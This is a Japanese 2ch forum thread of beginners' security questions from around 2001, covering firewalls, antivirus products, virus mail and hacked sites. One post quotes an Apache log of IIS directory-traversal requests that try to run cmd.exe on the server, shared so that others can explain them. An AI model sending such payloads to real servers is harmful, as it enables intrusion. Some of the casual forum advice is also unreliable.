■ 初心者用質問スレッド Part5 ■

セキュリティ関係で、どこに質問したら良いかわからない人は
こちらにどうぞ。

前スレhttp://pc.2ch.net/test/read.cgi/sec/1006374515/l50

関連リンク >>2-10 >>11-20
各種フィヤーウォール ログ解析ツール 日本語化パッチ等
セキュリティチェックサイト whois 解説サイト 最新ウィルス情報などは>>2
関連スレ・関連板は>>3
その他>>4-10
ずれていたら>>1-50参照

【各種 Firewall】
ZoneAlarm http://www.zonelabs.com/
Sygate Personal Firewall http://www.sygate.com/
Tiny Personal Firewall http://www.tinysoftware.com/
AtGuard http://download.lycos.com/swbasic/BasicResults.asp?query=atgd322
BlackICE Defender http://www.toyo.co.jp/security/
Snort for Win32 http://www.datanerds.net/~mike/snort.html
【ログ解析ツール】
ICEWatch http://keir.net/icewatch.html
ZoneLog Analyser http://zonelog.co.uk/
TPF Log Analyzer （Tiny Personal Firewall用）
http://server47.hypermart.net/tinyfirewall/
【日本語パッチ 等】
ZoneAlarm　Pro体験版 http://www.zonelabs.com/zap_download_trial_4.htm
ZoneAlarm 日本語化パッチ その 1 http://etcd.virtualave.net/
ZoneAlarm 日本語化パッチ その 2 http://www.ryulife.com/net/security/index.html
Tiny Personal Firewall 日本語化パッチ
http://www.geocities.co.jp/SiliconValley-Cupertino/2943/

【セキュリティ チェックサイト
Shields UP ! https://grc.com/x/ne.dll?bh0bkyd2
Shields UP ! の日本語解説サイト http://www.upsizing.co.jp/news/report0426.htm
Symantec Security Check http://security2.norton.com/common/1033/sym/sym_intro.asp
Secure Design - Port Scan Security Check
http://www.sdesign.com/securitytest/
セキュリティチェックサイトのリンク集
http://www.toyo.co.jp/security/ice/advice/Support/KB/q000026/default.htm
【Whois】
APNIC http://www.apnic.net/
JPNIC Whois Gateway http://whois.nic.ad.jp/cgi-bin/whois_gw
IPドメインSEARCH　MSE株式会社 http://www.mse.co.jp/ip_domain/index.shtml
【解説サイト】
Firewall 解説サイト Fire & Forest http://eazyfox.tripod.co.jp/
Snort 解説サイト http://www.port139.co.jp/ntsec_snort.htm

ウィルス情報はこの辺で得られます。
http://www.ipa.go.jp/security/index.html
http://www.symantec.com/region/jp/
http://www.trendmicro.co.jp/
http://www.nai.com/japan/

[過去スレ・関連スレッド・関連板]

Part 4　http://pc.2ch.net/test/read.cgi/sec/1006374515/l50
Part 3 http://pc.2ch.net/test/read.cgi/sec/1000914322/

最強のファイアーウォールソフトって何かな？http://pc.2ch.net/test/read.cgi/sec/988724444/l50
最強のウィルス対策用ソフト http://pc.2ch.net/test/read.cgi/sec/1000957607/l50
ZoneAlarm　Part3 http://pc.2ch.net/test/read.cgi/sec/1006399748/l50
Tiny Personal Firewall Part2 http://pc.2ch.net/test/read.cgi/sec/1006423282/l50
＿■■BlackICEスレ■■＿ http://pc.2ch.net/test/read.cgi/sec/992171869/l50
SygatePersonalFireWall http://pc.2ch.net/test/read.cgi/sec/993936202/l50

ノートン Internet Securoty2002 Ver.3 http://pc.2ch.net/test/read.cgi/sec/1007009737/l50
ウイルスバスター2002 http://pc.2ch.net/test/read.cgi/sec/1002745629/l50
マカフィーってだめなの！PART2 http://pc.2ch.net/test/read.cgi/sec/1007480057/l50

AVG Anti-Virus http://pc.2ch.net/test/read.cgi/sec/1001835534/l50
H+BEDV Antivir Personal Edition http://pc.2ch.net/test/read.cgi/sec/1004122172/l50
アンチドートを語ろう♪ http://pc.2ch.net/test/read.cgi/sec/1003987914/l50

このウイルス何？ http://pc.2ch.net/test/read.cgi/sec/999636595/l50

[Windows板] 広告カットとファイヤーウォールソフ ト。
http://yasai.2ch.net/win/kako/971/971411733.html
[パソコン一般板] 自分のパソコンへの不正侵入対策してますか？2
http://salad.2ch.net/pc/kako/980/980600110.html
[初級ネット板] 簡易ファイアーオール
http://mentai.2ch.net/hack/kako/972/972826108.html

パソコン初心者＠2ch掲示板 http://pc.2ch.net/pcqa/
初級ネットワーク＠2ch掲示板 http://pc.2ch.net/hack/
windows＠2ch掲示板 http://pc.2ch.net/win/
ソフトウェア http://pc.2ch.net/software/
ダウンロードソフト(download板) http://pc.2ch.net/download/
パソコン一般＠2ch掲示板 http://pc.2ch.net/pc/

「森で遊ぼう」
(ファイヤーウォール等セキュリティ関係解説サイト
ダウンロードページのリンク　日本語解説ページあり)
http://eazyfox.tripod.co.jp/


・IE(インターネットエクスプローラ)やOE(アウトルックエクスプレス)
は危ないと感じた人達へ

ネスケ（ネットスケープコミュニケータ）を使用する
という手段があることも念頭にいれておいてください
http://home.netscape.com/ja/

http://pc.2ch.net/test/read.cgi/sec/1006374515/l50

このスレは　まだ準備中です
しばらくの間は前スレを利用してください

○ネットセキュリティー板 質問、雑談スレッド[3]○
http://pc.2ch.net/test/read.cgi/sec/1006859839/l50

ファイアーウォールソフト 総合スレッド Part2
http://pc.2ch.net/test/read.cgi/sec/991646115/l50

くだらねぇ質問はここに書き込め　Ver212
http://pc.2ch.net/test/read.cgi/sec/1002134745/l50

乙彼>>1

前スレdat落ちしたのでageておく

NISを使っている環境で、NAV+ZoneAlarmを使いたい場合は
NISをアンインストールしないといけないの？

ほんとにこういうスレはありがたいよね。
1さん、お疲れ様。

>>3
追加
スパイウｴア発見専用ソフト｢Ad-aware｣
http://pc.2ch.net/test/read.cgi/sec/1003749900/l50

よろしくお願いします。
ICMPというものが、ファイアーウォールのログに大量に
残っているのですが、これは何らかのアタックなのでしょうか？

クロスアップデート版について。
我がノートＰＣに、マキャフィーがプレインストール
されていたのですが、そんな私にも、クロスアップデート版は
適切ですか？

マキャフィーから乗り換える方用ですってのはわかってるん
ですけど、値段が安いですよね、なにか作業がいるんでしょうか。
っていうか、どうやって乗り換えるか否かをソフトが判定するん
でしょうか。

製品版か、どっち買ったらいいのかな。教えてくださいえらい人。

WinXP home editionを使用してるのですが、NIS2002の
アンインストールが出来なくなりました。
スタートメニューのNISのアンインストールはAdministratorでないとできないので、
Safe mode起動をしましたが、 グラフィカルモードを使用しろとエラーを吐きます。
仕方なくコントロールパネルから試行すると、致命的なエラーになった上、
NISが使用出来なくなりました。どうにか修復する方法はないでしょうか？

>>16
Administratorでログオンしてアンインストール
できないの？

トレンドマイクロのオンラインスキャンをかけると３回に１回くらいトロイの木馬が検出されます．
「再起動すると駆除されます」とダイアログが出てから全ファイルのスキャンが始まり，感染ファイルは見つかりません．
再起動後，駆除用（？）のDOS窓が開いて，もう一度オンラインスキャンをかけるとなにも出ないのですが，２，３回パソコンを再起動してからオンラインスキャンをかけるとまたトロイが検出されます．

これってパソコンの中のファイルのどれかが感染してるのでしょうか？
OS再インストールしたほうが良い？

↑環境はwin2000 pro SP1です．
ワクチンソフトは入ってません．

>>15
根本的にマカフィー以外の製品を使うことを
おすすめします

詳しくは>>3のマカフィーってだめなの！
のスレでわかると思います

マカフィー「から」「乗り換える」んよ。たとえばＮＩＳに。
で、製品版か、ＣＵ版か。はう〜。
いいや、製品版買ってくればまちがいないよね。みなさんおやすみ。

サイト荒らしにあい、
それ以降ウイルスが毎日、公開アドレスに送られてきます。
BADTRANSBか、サーカムがほとんどです。
これはやはり手動で送信？　オートスケジューラとかあるんですかねえ。

あと、さすがに毎日だけあって、メアドが毎日違います。
あれはヘッダ情報を変えてるんでしょうか？
どうやるんだろう。
で、これが本当に偽装メアドだとして、
本メアドを探り当てるにはどうすればいいでしょうか。

教えてくれたらなんかお礼します。

＞２２
あなたが「サイト荒らしにあ」ったのがいつか判りませんが、
ウィルスメールは、それとは無関係に来ているのだと思います。
たぶん偶然、ウィルスの流行とサイト荒らしのタイミングが一致したのでは。
ちなみにうちにも、毎日ウィルスが届きます。掲示板も無いし、荒らしにあったこともありません。
メールアドレスも、当然ぜんぶ違います。
なんでも悪意に解釈しないほうが良いでしょう

オンラインスキャンでトロイが検出されたみたいだけど
これってつまり誰かにずっと見られてたって事なんですか？
ウィルスバスターについてるファイアーウォールとか言うのは
ちょっとは役に立ってるのでしょうか？

>>23
残念ですが、全てのメアドは返信しても戻ってきてしまいます。
そういうことなんです。

＞25
メールのアンダーバー消しても？

>>17
XPのHome Editionはセーフモード起動でないとAdministratorになれないようです。
セーフモードではインストーラーが動いてくれなく、何も出来ない状況になってしまいました。

98SEを、クリーンインストールして、その状態でie6を
ダウンロード、その後ZONEALARMを入れました。
今までは、ぞぬを入れていてもほとんどパソコンに
アクセスはなかったのですが、今回クリーンインストールしてからは
ネットにつないだ直後に必ずport6699にアクセスがあります。
今3分もたっていませんが、すでに3回アタックがあります。
ieをダウンロードしている間firewallを起動してなかったので、
何かされたのかと思ってとても不安です。

ちなみに、今警告で
the firewall has blocked ineternet access to your
computer (tcp port 6699)from 66.75.158.131(tcp port 4023)
(tcp flags:s)

1st of 2 alerts
とでています。
何かされたのでしょうか・・・？
心配なので、よろしくお願いします。

またきました。同じipからです。

また・・・同じipです。

あなたの前にそのIPを持ってた人がWinMX使ってたんでしょう、たぶん。
さほど気にする必要はなしです。

IPは固定じゃないんですが・・・
今繋げなおして見ています。
61.150.126.69から（http）にきました。

今また一度切って繋いだら、
the firewall has blocked routed traffic from
78.112.61.211 to 96.1.0.0(igmp)
とでました。。。

やたらと多くないですか？
何度ももうしわけありませんが・・・

騒ぎすぎ。

＞３３
どっちにしろブロックできているんだから、気にする必要無いと思いますが。

>メールのアンダーバー消しても？
？意味がわかりません…

かなりがいしゅつなのかのしれませんが
自分なりに探して見つからなかったので
質問させてください。
NAV2002を使っていてメールから
W32.Badtrans.B@mmを検出したんですけど
検疫も削除もできません。どうすればいいでしょうか。
定義ファイルは最新でOSは98、メーラーはBecky2です。

＞３６
すまん、意味不明な書き方だったな。バッドトランスなら
メールアドレスのアタマんところに「_」が付いていますよね。
それを消して送っても、戻ってきますか？

>>36
引用元が分からないんだけど、
BadTransなら、メールアドレスの前に_（アンダースコア）を付ける
という小細工をやるから、通常の「返信」では届かない。
その一文字を消してやれば届くわけ。
ただし、必ずではない。デフォルトの送信元として、いいかげんな
アドレスを使ってくる場合があるので。
詳しく知りたければ、トレンドマイクロとかシマンテックのサイトへ。

>>37
がいしゅつというか、BadTransのスレ見るべし。
大体分かっていることはまとめてあるし、それでも分からなければ
質問するべし。
での、NAV使っているならシマンテックのサイトに行って
調べる方がいいかもしれんな。

直接的な解決じゃないかもしれませんが
nPOPというソフトでサーバーから直接メールを削除しました。
あちがとうございました。

ウィルスについての質問をします。

先日社内で５台ほどのＰＣがウィルスにかかり（当時の担当者不在でウィルス名不明）
その５台全てフォーマットをかけて初期状態に戻しました。
ですが、一週間ほど経った現在そのうちの２台がエクスプローラーを開けない状態になりました。
ビジー状態になります。ＩＥの方は開くことが出来ますがしばらく経つとエクスプローラーの
ビジー状態のエラーとともにフリーズしてしまいます。

ウィルススキャンをかけたのですがウィルスは見当たりません。
ＰＣは全てゲートウェイでＩＥは5.0を使用しています。

何か解決方法や同じ症状になった方いたら教えていただきたいのですが
よろしくお願いします。

>>41
ウイルスの影響じゃないと思うんだけど。

>42
レスありがとうございます。
エクスプローラーの原因ですかね？

>>43
ファイルが壊れているのか、レジストリがおかしくなったか、
いろいろ考えられるからなあ。
スキャンディスクでクラスタスキャン（完全）してみるとか、
scanreg /fix
とかで直ったらもうけものなんだけど。
俺も多分ウイルス関係じゃないように思うなあ。

>44
ﾚｽありがとうございます。
早速試してみます。ありがとうございました。

初心者の下らない相談ですみません。

昨日、ＨＰをハッキングされ、ある１つのディレクトリー中の数十個のファイルをdeleteされてしましました。
本日、ISPに連絡してパスワード等変更し、調べてもらったところ、deleteした人物は串を通していなかったようです。
県警に届ければ相手側のispに情報開示を請求できるとのことですが、損害賠償など求めることはできるのでしょうか（ごめんなさい、と謝ってくれるだけでもいいですが）？
というかIPだけから犯人の特定は可能なものなのでしょうか？

よろしくお願いいたします。

>>46
相手ISP側がログ公開等の協力をしてくれれば可能。
でも串通してなかったんでしょ？
多分踏み台だよ、それ。

ちわす、はじめまして。
モナー板などで本日猛威を振るったらしいフシアナサントラップ
について解説キボンヌ。
http://news.2ch.net/test/read.cgi/newsplus/1008578204/
どーゆー仕組みでこういう事が可能なの？対策は？

ありゃ、よく見たらここにも関連スレ立ってましたね
http://pc.2ch.net/test/read.cgi/sec/1008581128/l50
こっちを観察しま〜す。

＞47
答えてくださってありがとうございます。

踏み台の場合ですと、やはり犯人の特定は難しいでしょうか？
もし難しい場合は警察も非協力的でしょうし、遡及はあきらめようかとも思います。

>>50
いや、取り敢えず行っておけ。
放っておくと再犯の可能性が大。

＞51
そうですね。
努力できる部分は頑張ってきます。

どうもありがとうございました。

ズバリお聞きします。
初心者でも簡単に扱えるファイアウォールはどれでしょう？

>>53
zone alarmじゃないの？
使ったことないからよく知らんけど。

>>54
英語出来ないです。

掲示板からIPを抜く方法を説明しているようなサイトってありませんでしょうか？
あるBBSにて、目に余る行為をするものがいるのでISPに連絡をしたいんです。
普通は管理人さんが行うべきことなんですが、ぶっちゃけその対象が管理人でして。
無断転載を注意で済めば良かったんですが、聞く耳を持たない様子。
フリースペース+レンタルBBSなんですけど、方法はあるんでしょうか？

***チャットのPMからどうやってIP抜くの？*** の1＝>>56？
http://pc.2ch.net/test/read.cgi/sec/1008566152/l50

>>57
違うよー。

誰か最初の一歩だけでも…。

>>56
そんな掲示板行かなきゃいいじゃん

windows板から来ました。こっちの方が専門的というのを伺いましたので。
McAfee VirusScanがプリインストールされているパソコン（WinMe)をXPにアップグレードしました。
ところが、McAfee VirusScanがXPに対応していないようで動作しません。
アンインストールもできない状態になってしまいました。
最善の対処方法を教えてください。お願いします。

http://pc.2ch.net/test/read.cgi/win/1008604281/
新たなセキュリティホール

>>60
XPをまずアンインストールしてからやってみて

>>62
ありがとうございます。
できれば、あまり手間がかからないほうが良いのですが（他人のパソコンの為）
なんか良い方法ありませんでしょうか？

>>63
それしかないと思うぞ
とにかくOSの上書きアップデートはこれからはしないように
トラブルの原因になる

回線切ったあとすぐにパソコンからどこかに電話するんだけど
これってウイルスのせい？

>>65
どっかってどこよ？
ウイルスはさすがに電話かけないぞ

板違いですが…。

登山キャンプ板のあるスレの５９の書き込みが発端で大変なことになってます。
５９の行ったテロとも言える行為でその後のレスがすごいです。

http://yasai.2ch.net/test/read.cgi/out/1007547069/

５９の悪行みてやってください。
そのあとのビビリレスも見てやってください。

>>67
宣伝すな！

フリーの掲示板にうっかり個人情報を載せてしまいました。
発言自体は消したのですがGoogleのキャッシュに残ってしまっています。
これを消すにはどうしたらよいか、御存知の方はいらっしゃいませんでしょうか？

板違いでしたら申し訳ございません。
６〜８週間たてば自動的に更新されて消えるものなのでしょうか。
だといいのですが…。

うちのマシンに「Ptsnoop」というのが常駐してます。
調べたところ、
同じ名前のウィルスが存在することがわかりました。
しかし、モデムのドライバーにも同じ名前があることがわかりました。
http://www.fs-support.yamada.co.jp/df/v-descs/v-descs2/ptsnoop.htm

で、自分のマシンに入り込んでるのがどっちかわかりません。
モデム用のソフトならば消すわけにはいかないので困ってます。
ちなみにモデムはzolrix製です。

ptsnoop.exeのある場所は、c:\ptsnoop.exeで、ウィルス情報に載ってる場所とは
違うのですが、win.iniに「load=」の形で書かれているというところはウィルス情報通りでした。
これはウィルスなんでしょうか？

よろしくおねがいします。
ＤＳＬのセキュリテーのためにメルコのＬａｎｎｅｅｄというルーターを
買いましたが、設定できません。メーカーは、いつも話し中で連絡とれず
よろしくお願いします。

数字を設定し、保存をクリックするのですが、保存できず、あとがつづきません。
Ｗ９８，ＩＥ６です。

>>71
板違いだと思うんだが。

７２＞そうですか。すみません。

Block Backdoor/SubSeven Trojan　というのを
internet security がブロックしたみたいなんですけど
これってウィルス感染してるという事でしょうか？
もし感染してたらどうすれば良いのでしょうか？

>>74
なぜウイルススキャンをしないのだ？？

＞75
はい　直ちに

７４の者です。
ウィルススキャンには引っ掛からないみたいなんですが
安心して良いものでしょうか？

>>74
それは SubSeven（トロイ）用のポートに向けて
無差別にパケットを飛ばしてるヤツがいるだけで、

あんたのＰＣにSubSevenが
入ってたとしたらNISがその通信をブロックした、
入ってなかったら単にゴミパケットが飛んできた、
…というだけだ。

あるＨＰにアクセスした際、ノ−トンのＰＦＷが以下の注意報を
接続を切るまで延々と繰り返し出してました。

ﾌｧｲｱｳｫｰﾙ Event Log
01/12/18 スーパーバイザ
未使用ﾎﾟｰﾄ遮断機能が通信を遮断しました｡
詳細:ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは
www.nagoya-mag.co.jp(210.162.119.170),auth(113)

これはここの“仕様”なのでしょうか？
それとも、なにやら良からぬ意図のモノなのでしょうか？

>>69
http://www.google.com/intl/ja/remove.html

>>79
たしかに113に来るけど、うちには単発で、連続しては来ないな。
延々と出続けるのなら、経路上のルータのどこかで113の通過に
なんらかの規制がかけられていてリトライしてる可能性あり。
auth(113)だったら害はないので、うざいかもしれんが放置しとけや。
ここに限らず、sendmail を使ってるメル鯖ならかなりの確率で
接続と同時に 113 にパケットを飛ばしてるよ。

Apacheのログみたら誰かが下のようにアクセスしようとしてるのですが、
彼は何をしたいのでしょうか。DQNな質問すみません。

216.125.4.213 - - [07/Dec/2001:18:41:27 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 286
216.125.4.213 - - [07/Dec/2001:18:41:27 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 284
216.125.4.213 - - [07/Dec/2001:18:41:27 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
216.125.4.213 - - [07/Dec/2001:18:41:28 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
216.125.4.213 - - [07/Dec/2001:18:41:28 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
216.125.4.213 - - [07/Dec/2001:18:41:29 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
216.125.4.213 - - [07/Dec/2001:18:41:29 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
216.125.4.213 - - [07/Dec/2001:18:41:30 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
216.125.4.213 - - [07/Dec/2001:18:41:30 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
216.125.4.213 - - [07/Dec/2001:18:41:30 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
216.125.4.213 - - [07/Dec/2001:18:41:31 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
216.125.4.213 - - [07/Dec/2001:18:41:31 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
216.125.4.213 - - [07/Dec/2001:18:41:31 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
216.125.4.213 - - [07/Dec/2001:18:41:32 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
216.125.4.213 - - [07/Dec/2001:18:41:32 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
216.125.4.213 - - [07/Dec/2001:18:41:33 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308

>>81
ログにある文字列をgoogleに放りこめ。タコが。
今さらこんな質問をするヤツに限って、
「うちはIISじゃなくてApacheだから安全なんだへへん」
なんてほざくんだよな。

うちはIISじゃなくてApacheだから安全なんだへへん

http://homepage2.nifty.com/winfaq/virus_and_security.html

最近やっとWWWサーバのログから、その文字列が減ってきたいうのに。
IISです。自分のものでないんでこれでやらなきゃしかたないです。

ウィルスバスター・オンライン・スキャンをしようとしたのですが、
セキュリティのレベルを下げてもできません。

http://www.trendmicro.co.jp/hcall/scan.htm

ルーターを使っているのでそれが原因でしょうか？

>>85
できないとはどういう風に？
エラーの詳細を書きなさい

１日２〜３時間ネットに繋ぐ程度のライトユーザーなんですが
ファイヤーウォールって必要なんでしょうか？
恐いのはパソコンの中を覗かれて個人情報引き出されたり、データ消されたりする事なんで
ウィルスチェックはきっちりやってます。
サーバー立ててるわけじゃないからポートスキャンとかping攻撃されたとしても
大して影響ないような気がするんですが・・・認識が甘いでしょうか？
ご意見お聞かせくださいませ。

>>87
ウイルスとハッキングは別物だぞ
まあ一個人を狙ってのハッキングはほぼありえないを思うが
しかもダイヤルアップだろうからIPアドレスは固定されないし

ファイヤーウォールソフトはフリーでもあるので試してみるとよい

JS_EXCEPTION.D
ttp://www.trendmicro.co.jp/virusinfo/default3.asp?VName=JS_EXCEPTION.D
の対処方教えてください。
ノートンで検出できませんが、症状からいって明らかにかかってます。

×対処方
○対処法
（鬱

>>90
IEにサービスパックをあててるのかい？

ＺＡ入れてるのですが、いつも同じところからのインターネットアクセスをブロックします。
whoisで調べたら、インターソーラーとかいう会社でした。検索では見つからないのですが・・・
　これはどういう事なのでしょう？

>>88
>ウイルスとハッキングは別物だぞ
あ、すみません。書き方悪かったっすね。
一応両者の区別はついてます。
トロイとかに感染しちゃうと外部からのアタック（？）でパソコン操作されちゃうんですよね。
ファイヤーウォール入れとけばそのアタックを遮断してくれるんだろうけど、
ウィスルチェックをきちんとして、感染してなければ
アタックされても痛くも痒くもないのかなぁと思ったんですよ。。
ウィスルチェックちゃんとして、TCP/IP以外の余計なプロトコルは全部削除して、
ＩＥのセキュリティーホールを防ぐパッチを、こまめに当てていれば大丈夫ですよね？
甘いのかなぁ・・・
> ファイヤーウォールソフトはフリーでもあるので試してみるとよい
ゾーンアラームってのよく聞きますよね。検索してみますです。

>>88
便乗質問させて下さい。
ADSLのUSBモデムですが、ライトユーザーです。
IＰアドレスは固定されないので、
ダイアルアップの場合と同程度の危険度でしょうか？

>>92
気にするな

>>93
まあIEとOEを使わないのが一番いいのだが、、
セキュリティには日頃から注意して置くように

>>94
んだ そのとおり
でもウイルス対策は万全にしとけよ

>>97
ありがとー！

／／／／／／／／／／／／／／／／／／／

■ 全国のハッカー＆荒らし集合！！ ■




http://kgy999.ath.cx/cgi-bin/1/2.cgi
史上最悪のUG掲示板

／／／／／／／／／／／／／／／／／／／／／

;;
;;;

>>86

現在のセキュリティの設定では、このページのActiveXコントロールは実行できません。そのためこのページは正確に表示されない可能性があります。

というメッセージが表れて、スキャン機能が実行されません。
ページの下のほうには×表示された画像が表示されます。

ブラウザのセキュリティを最低にしても同じなので、
ルーターが原因だと思います。
こんなに立派なルーターなら
ファイアーウオールは必要ないのかな(ﾜﾗ

>>100
アクティブXをONにしてるかい？
対応のブラウザでやってるかい？

まあオンラインスキャンなんて気休めだから
ウイルス対策ソフトを買ってくるべし

>アクティブXをONにしてるかい？
はい
>対応のブラウザでやってるかい？
IEです。

ウィルスバスターは入れてます。
オンライン・スキャンを実行できない理由が知りたいだけ〜

>>93
自分もちょっと思った。
アンチウィルスソフト入れとけば、ウィルスには感染しない。
「トロイの木馬」もウィルスだとすれば、感染しない。
プログラムが作動してPCの情報を外に持っていく際に
FWがあれば遮断するが、そもそも感染しないのだから
作動もしない。
とか。間違ってるけどね。

有料になったが定義ファイルの更新は無料なんで
今だにフリーのアンチウイルスソフトInoculateIT Personal Edition
使っているんだけど、昨日からAuto Download出来ないんだけど、
ping打っても応答無しで。
正確には最新の定義ファイルのバージョンが見えて肝心のDLが始まらない。
同じような方いますか？

>>102
ActiveXコントロールとプラグイン＞有効にする

スクリプトを実行しても安全だとマークされているActivXコントロールの
スクリプトの実行＞有効にする

著名済みActivXコントロールのダウンロード＞有効にする

アクティブスクリプト＞有効にする

これで動くはずだが

>>104
フリーのものはやめとけよ

>>103
うん。俺もそう思ってた…。
実際に新種のウイルスに感染するまではね。
アンチウイルス入れてても感染するときはするし、
感染した瞬間もう、トロイが動き出してるんだよ。
で、その時にFW無かったら情報漏れ漏れ…。

新種のウイルスに完全対応しようと思ったら
データのアップデートを毎日する必要がある。
ブラウザのセキュリティホールもしかり、
でも、FWは一度設定したら、そうそうアップデートの必要なし。
正しく設定していれば取りあえず情報漏れだけは防いでくれる。

>>106
なんで？

>>106
何故？有料がいいとは限らんぞ？
少なくとも昔のマカフィーよりは総合的に上だと思うが…。
あくまで「昔の」な？　今は知らん。

ＣＡＴＶで繋いでいます。ルーター無しです。
いろいろスレを読んだのですが、Zoneと、ノートンのAntiVirus に
しようと思っていますが、これだけではダメですか？
連続接続時間は、５〜６時間ぐらいなのですが。
よろしくお願いします。

>>110
ダメとは何が？
使い方を間違ってなければ問題ないぞ

ごめんなさい。
セキュリティ的に、甘いとか十分かを教えて頂きたかったのです。
これも入れた方がいいよ・・・というものがありましたら
アドバイスお願いします。

>>112
ウイルス対策ソフトやファイヤーウォールソフトを２つ以上同時に
起動させるとまずいよ

>>110
ノートンにしたら？
いや、なんとなくですが…

>113
そうなんですか？
この組み合わせは大丈夫だと見たのですが・・・。

>114
ノートンのInternet Security2002は不具合が多いと聞いたので
アンチウイルスのみにして、ファイアーウォールをZoneにしようと
思ったんです。

>>115
いや意味を取り違えてもらうと困るんだが
ウイルス対策ソフトを同時に２つ起動したり
ってことよ

ノートンに不具合なんて別にないけどね

最近98からWin2kに換えました。
で、ネットワークでのフォルダ共有についてなんですが、
あるフォルダをアクセス許可で｢Everyone｣とすると、
当然、誰でも入ってこれますよね。
そこにパスワードをかけたいんですが、どうすればいいでしょうか?
つまり、パスワードを知っている人なら
誰でも入れるようにしたいんです。
よろしくお願いします。

私、意味を取り違えてたのかも知れません。
一緒に常駐させてはいけないのですか？

>>117
マルチは逝ってよし

>>118
ん？ まだ言ってることがわからないかい？
常駐とは何を常駐させるつもりだい？

>>110
ノートンに不具合なんかないですが。
いや、今まではの話ですけど…

NIS2002は不具合があるんじゃなくて初心者には使い辛い。

>>103
>>107
なるほど。
いや、大変勉強になりました。ゾーンアラーム使ってみる事にします。
ありがとうございました。

間違えた・・・
87=93でした（鬱

たびたびすみません。
不具合なんて言い方よくなかったですね・・・。

今ノートンの２００１の体験版を試用しています。（Win98)
最初、パソコンを立ち上げたら、ノートンの画面が出て、
「試用」を両方クリックします。
すると、地球とパソコンの絵が下に出ます。
これが>>115さんのおっしゃる起動ですか？

>>125
常駐の意味分ってないみたいだね。
スタートアップとかMSConfigとか分る？

>>125
常に動いているソフト（プログラム）を常駐ソフトっていうの。
アンチウイルス関係の多くがPC起動と同時に働くので、これも
設定で切らない限り常駐ソフトってわけ。

で、数種類のアンチウイルスを持つ、又はインストールしても
問題ないが、同時に動かすな！ってこと。
もっと簡単に言えばアンチウイルスは一つ、FWは一つにしろって
こと。

>>125
いや、アンチウィルスソフトを２つとか起動させとくとマズイって意味でしょ。

> ノートンのInternet Security2002は不具合が多いと聞いたので
> アンチウイルスのみにして、ファイアーウォールをZoneにしようと
> 思ったんです。
これでOKです。何の問題もないと思われ。

ZoneがＦＷ、ノートンAntiVirus がアンチウイルスと認識していたんです。

>>128さんに訳してもらちゃった・・・。ＯＫなんですよね！？よかった。
日本語から勉強してきます。
ありがとうございました。

それでＷＶをインストールするときに
ノートン先生をアンインストールさせられたのか・・

初めてメールをもらう方からのメールを見る時に、
添付ファイルがついていて、怖いので添付ファイルの内容を見たくないのですが、
どうやって見たらメールの文章だけを見れるのでしょうか？＾＾；
よかったら教えてください＾＾；

>>131
添付ファイルを開きたくない旨を伝える。

>>132さんへ

レスありがとうございます。
それも相手に失礼かなと思って、設定を変えてどうにか見れないかなと思うのですが・・・。
そういうのは不可能なんでしょうか？

>>133
ウイルス対策ソフトは入ってるんだろうね？

>>134さん

それが入ってないので・・・・怖いんです。
添付ファイルを見ないとやっぱりメール見れないですか？
Lycosのメールアドレスなんですが・・・。

>>135
は？
だったら今日は回線切って明日朝いちでソフト買って来い
ウイルスをばら撒かれるとこっちまで迷惑だ

すみません。質問なのですが、
htmlベースとJavaベースのセキュリティの違いはどのような
ものがあるかご存知の方いますか？個人認証において
通信間におけるセキュリティの違いを教えていただきたい
と思います。
ご存知の方、よろしくお願い致します。

>>136

　あ、はい、すいません＾＾；
　ばらまかないように気を付けます・・・・

>添付ファイルを見ないとやっぱりメール見れないですか？
ホントに初心者さんのようなので、難しい説明は省きますが、
「見れない」と思っていいでしょう。
>>136さんのおっしゃる通りアンチウィルスソフトを買ってウィルスチェックしてから
メールを見ることをお勧めします。

どうしても分からないことがあるので教えてください。
今はやりのW32.Badtransウイルスに感染している
ＰＣから携帯電話にメ−ルが送られた場合
携帯電話もウイルス感染する可能性ってあるのですか？

>>140
ない
携帯じゃ実行できないからね

携帯電話のTrojanならあります

>78
ありがとうございます

ちょいtest

172.31.0.9
172.19.88.198
192.168.100.94
192.168.14.3
10.16.67.67
10.2.5.1

からパケットが来る
何故?

>>145
アタックしてるから

>>144
キャリアがCATVとかじゃないの？
違ったらパケットのIPアドレス書き換えられてるとか。

激しく既出かもしれませんが、お教えください。

相手の携帯アドレス（ドコモ）が分かれば、相手に送り・送られた
メールを入手できるのでしょうか？友達が、援助系サイトでアドレス
を晒されて、俺が相談に乗っている時のメールのやりとりを晒したやつが
知っているようなのですが・・・。（さっき脅迫メールが来て、内容が
話していた事と大体一致するのです）
どうか、ご教授願います。

>>148
送り送られたメールってメールの内容のこと？
それは本人と送った人しか分からないよ

そうです。ドコモのセキュリティは信用してよろしいのですか？

>>150
大丈夫だと思われ

有り難うございます！！

すいません。質問です。先日www.top.or.jp/godhand/a2.htmlというアドレスが
